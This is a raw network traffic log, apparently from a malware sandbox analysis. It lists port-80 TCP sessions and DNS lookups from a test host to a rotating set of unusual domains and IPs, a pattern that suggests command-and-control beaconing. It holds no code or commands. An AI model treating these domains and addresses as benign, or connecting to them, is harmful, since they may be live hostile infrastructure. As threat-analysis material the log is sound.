                      Sep 13, 2024 12:28:06.104347944 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:06.109385014 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.015767097 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.015985012 CEST8050411154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:07.016155958 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:07.614531040 CEST5041180192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.633091927 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.638416052 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.638550043 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.649504900 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:08.656332970 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656459093 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656599998 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656626940 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656671047 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656709909 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656758070 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656785011 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:08.656810999 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804702997 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804866076 CEST8050412154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:09.804943085 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:10.160953045 CEST5041280192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.179222107 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.185266018 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:11.186613083 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.194531918 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:11.199580908 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118376970 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118525028 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:12.118591070 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:12.121663094 CEST5041380192.168.2.4154.23.184.240
                      Sep 13, 2024 12:28:12.126526117 CEST8050413154.23.184.240192.168.2.4
                      Sep 13, 2024 12:28:17.681004047 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.685942888 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:17.686033964 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.698633909 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:17.703483105 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.856379986 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.856400013 CEST805041447.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:18.860641003 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:19.207669020 CEST5041480192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.229573965 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.234514952 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:20.234606028 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.249839067 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:20.254688978 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.404572964 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.404675961 CEST805041547.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:21.405375004 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:21.754530907 CEST5041580192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.776308060 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.781291962 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.781495094 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.796809912 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:22.801691055 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801712036 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801719904 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801723003 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801743984 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801909924 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801925898 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801934004 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:22.801943064 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960778952 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960800886 CEST805041647.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:23.960870981 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:24.301481009 CEST5041680192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.319896936 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.325309038 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:25.325634956 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.332824945 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:25.337790012 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.499989033 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.500077009 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:26.500137091 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:26.503182888 CEST5041780192.168.2.447.104.180.139
                      Sep 13, 2024 12:28:26.507980108 CEST805041747.104.180.139192.168.2.4
                      Sep 13, 2024 12:28:39.624701023 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.630158901 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:39.630338907 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.642297983 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:39.647186041 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:41.033521891 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:41.038595915 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:41.145184994 CEST5041880192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:41.150513887 CEST80504183.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.163769007 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.169023037 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.169116974 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.178606987 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:42.183599949 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.647629023 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:42.647720098 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:43.694619894 CEST5041980192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:43.699718952 CEST80504193.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.710496902 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.715486050 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.715599060 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.726350069 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:44.731214046 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731312990 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731326103 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731379032 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731398106 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731489897 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731503010 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731540918 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:44.731554031 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:45.242965937 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:45.246673107 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:46.238883972 CEST5042080192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:46.243837118 CEST80504203.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:47.261060953 CEST5042180192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:47.266244888 CEST80504213.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:47.266534090 CEST5042180192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:47.273588896 CEST5042180192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:47.278481007 CEST80504213.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:47.744946957 CEST80504213.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:47.745104074 CEST80504213.33.130.190192.168.2.4
                      Sep 13, 2024 12:28:47.750673056 CEST5042180192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:47.751498938 CEST5042180192.168.2.43.33.130.190
                      Sep 13, 2024 12:28:47.758618116 CEST80504213.33.130.190192.168.2.4
                      Sep 13, 2024 12:29:00.958621979 CEST5042280192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:00.963485956 CEST8050422199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:00.963601112 CEST5042280192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:00.973885059 CEST5042280192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:00.978800058 CEST8050422199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:01.457920074 CEST8050422199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:01.458409071 CEST8050422199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:01.458414078 CEST8050422199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:01.458587885 CEST5042280192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:02.489105940 CEST5042280192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:03.535234928 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:03.548396111 CEST8050423199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:03.549143076 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:03.568825006 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:03.576730967 CEST8050423199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:04.037043095 CEST8050423199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:04.037086010 CEST8050423199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:04.037142992 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:04.037573099 CEST8050423199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:04.037626028 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:05.082865953 CEST5042380192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:06.123575926 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:06.128446102 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.128509045 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:06.139482975 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:06.144516945 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144542933 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144551039 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144568920 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144576073 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144582033 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144587040 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144593000 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.144598961 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.625369072 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.625754118 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.625762939 CEST8050424199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:06.625794888 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:06.625822067 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:07.646708965 CEST5042480192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:08.663840055 CEST5042580192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:08.668885946 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:08.668967962 CEST5042580192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:08.675864935 CEST5042580192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:08.680845976 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:09.136223078 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:09.136499882 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:09.136503935 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:09.136694908 CEST5042580192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:09.139133930 CEST5042580192.168.2.4199.59.243.226
                      Sep 13, 2024 12:29:09.143971920 CEST8050425199.59.243.226192.168.2.4
                      Sep 13, 2024 12:29:14.205454111 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:14.212407112 CEST8050426162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:14.212475061 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:14.322768927 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:14.327686071 CEST8050426162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:14.920083046 CEST8050426162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:14.920099974 CEST8050426162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:14.920111895 CEST8050426162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:14.920188904 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:14.920190096 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:15.832721949 CEST5042680192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:16.857779026 CEST5042780192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:16.864345074 CEST8050427162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:16.864459038 CEST5042780192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:16.876532078 CEST5042780192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:16.882390022 CEST8050427162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:17.468024015 CEST8050427162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:17.468199968 CEST8050427162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:17.468744040 CEST5042780192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:18.379573107 CEST5042780192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:19.406620026 CEST5042880192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:19.414068937 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.414292097 CEST5042880192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:19.425220013 CEST5042880192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:19.434923887 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.434932947 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.434936047 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.434938908 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.434942961 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.435050011 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.435053110 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.435060978 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:19.435555935 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:20.079303980 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:20.081110001 CEST8050428162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:20.081191063 CEST5042880192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:20.926470041 CEST5042880192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:21.945591927 CEST5042980192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:22.265465021 CEST8050429162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:22.265535116 CEST5042980192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:22.274085999 CEST5042980192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:22.279613972 CEST8050429162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:22.922122002 CEST8050429162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:22.922666073 CEST8050429162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:22.926625013 CEST5042980192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:22.926625013 CEST5042980192.168.2.4162.241.226.190
                      Sep 13, 2024 12:29:22.937216043 CEST8050429162.241.226.190192.168.2.4
                      Sep 13, 2024 12:29:29.056906939 CEST5043080192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:29.061918974 CEST805043091.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:29.068639994 CEST5043080192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:29.077130079 CEST5043080192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:29.082274914 CEST805043091.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:29.797451019 CEST805043091.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:29.797916889 CEST805043091.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:29.806639910 CEST5043080192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:30.582904100 CEST5043080192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:31.601289988 CEST5043180192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:31.608864069 CEST805043191.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:31.609319925 CEST5043180192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:31.621857882 CEST5043180192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:31.627937078 CEST805043191.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:32.306646109 CEST805043191.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:32.306997061 CEST805043191.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:32.307060003 CEST5043180192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:33.134644985 CEST5043180192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:34.148972988 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:34.240849972 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.240911007 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:34.260888100 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:34.260910988 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:34.266891956 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.266956091 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267014980 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267112970 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267142057 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267206907 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267235041 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267658949 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.267687082 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.937767982 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:34.992743969 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:35.066162109 CEST805043291.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:35.072773933 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:35.773086071 CEST5043280192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:36.789824009 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:36.795207024 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:36.795300961 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:36.805512905 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:36.811886072 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516345978 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516374111 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516396046 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516410112 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516431093 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516467094 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516483068 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516516924 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516534090 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516534090 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.516590118 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.516613960 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.516613960 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.517033100 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.526339054 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.526634932 CEST805043391.215.85.23192.168.2.4
                      Sep 13, 2024 12:29:37.527153969 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.532932997 CEST5043380192.168.2.491.215.85.23
                      Sep 13, 2024 12:29:37.539340973 CEST805043391.215.85.23192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 13, 2024 12:26:59.657924891 CEST5034953192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:00.641196012 CEST53503491.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:02.465179920 CEST5353213162.159.36.2192.168.2.4
                      Sep 13, 2024 12:27:02.969276905 CEST6005553192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:03.041141033 CEST53600551.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:05.651211977 CEST6321953192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:05.662040949 CEST53632191.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:10.681729078 CEST6272553192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:11.187170982 CEST53627251.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:27.523442030 CEST5725453192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:27.533168077 CEST53572541.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:35.594134092 CEST5192253192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:35.691088915 CEST53519221.1.1.1192.168.2.4
                      Sep 13, 2024 12:27:49.135979891 CEST5684953192.168.2.41.1.1.1
                      Sep 13, 2024 12:27:49.651725054 CEST53568491.1.1.1192.168.2.4
                      Sep 13, 2024 12:28:03.118635893 CEST5429253192.168.2.41.1.1.1
                      Sep 13, 2024 12:28:03.544994116 CEST53542921.1.1.1192.168.2.4
                      Sep 13, 2024 12:28:17.132832050 CEST5589653192.168.2.41.1.1.1
                      Sep 13, 2024 12:28:17.678682089 CEST53558961.1.1.1192.168.2.4
                      Sep 13, 2024 12:28:31.509536028 CEST5186453192.168.2.41.1.1.1
                      Sep 13, 2024 12:28:31.529308081 CEST53518641.1.1.1192.168.2.4
                      Sep 13, 2024 12:28:39.601032972 CEST6262253192.168.2.41.1.1.1
                      Sep 13, 2024 12:28:39.616849899 CEST53626221.1.1.1192.168.2.4
                      Sep 13, 2024 12:28:52.791443110 CEST6458753192.168.2.41.1.1.1
                      Sep 13, 2024 12:28:52.807446003 CEST53645871.1.1.1192.168.2.4
                      Sep 13, 2024 12:29:00.870595932 CEST5428553192.168.2.41.1.1.1
                      Sep 13, 2024 12:29:00.933579922 CEST53542851.1.1.1192.168.2.4
                      Sep 13, 2024 12:29:14.161935091 CEST5155353192.168.2.41.1.1.1
                      Sep 13, 2024 12:29:14.184401035 CEST53515531.1.1.1192.168.2.4
                      Sep 13, 2024 12:29:27.929528952 CEST5748253192.168.2.41.1.1.1
                      Sep 13, 2024 12:29:28.942620993 CEST5748253192.168.2.41.1.1.1
                      Sep 13, 2024 12:29:29.049941063 CEST53574821.1.1.1192.168.2.4
                      Sep 13, 2024 12:29:29.049952984 CEST53574821.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 13, 2024 12:26:59.657924891 CEST192.168.2.41.1.1.10x987fStandard query (0)www.teksales.spaceA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:02.969276905 CEST192.168.2.41.1.1.10xf521Standard query (0)56.126.166.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                      Sep 13, 2024 12:27:05.651211977 CEST192.168.2.41.1.1.10x3aeStandard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:10.681729078 CEST192.168.2.41.1.1.10x9108Standard query (0)www.route4.orgA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:27.523442030 CEST192.168.2.41.1.1.10x9841Standard query (0)www.meery.storeA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:35.594134092 CEST192.168.2.41.1.1.10x6f02Standard query (0)www.subitoadomicilio.shopA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:49.135979891 CEST192.168.2.41.1.1.10x4fc4Standard query (0)www.syvra.xyzA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:03.118635893 CEST192.168.2.41.1.1.10x1e17Standard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:17.132832050 CEST192.168.2.41.1.1.10x65b4Standard query (0)www.zhuoyueapp.topA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:31.509536028 CEST192.168.2.41.1.1.10xb924Standard query (0)www.pelus-pijama-pro.shopA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:39.601032972 CEST192.168.2.41.1.1.10x5717Standard query (0)www.autonashville.comA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:52.791443110 CEST192.168.2.41.1.1.10x5d1Standard query (0)www.torkstallningar.shopA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:00.870595932 CEST192.168.2.41.1.1.10x28bfStandard query (0)www.dom-2.onlineA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:14.161935091 CEST192.168.2.41.1.1.10x136Standard query (0)www.easyanalytics.siteA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:27.929528952 CEST192.168.2.41.1.1.10xabb0Standard query (0)www.kalomor.topA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:28.942620993 CEST192.168.2.41.1.1.10xabb0Standard query (0)www.kalomor.topA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 13, 2024 12:27:00.641196012 CEST1.1.1.1192.168.2.40x987fName error (3)www.teksales.spacenonenoneA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:03.041141033 CEST1.1.1.1192.168.2.40xf521Name error (3)56.126.166.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                      Sep 13, 2024 12:27:05.662040949 CEST1.1.1.1192.168.2.40x3aeName error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
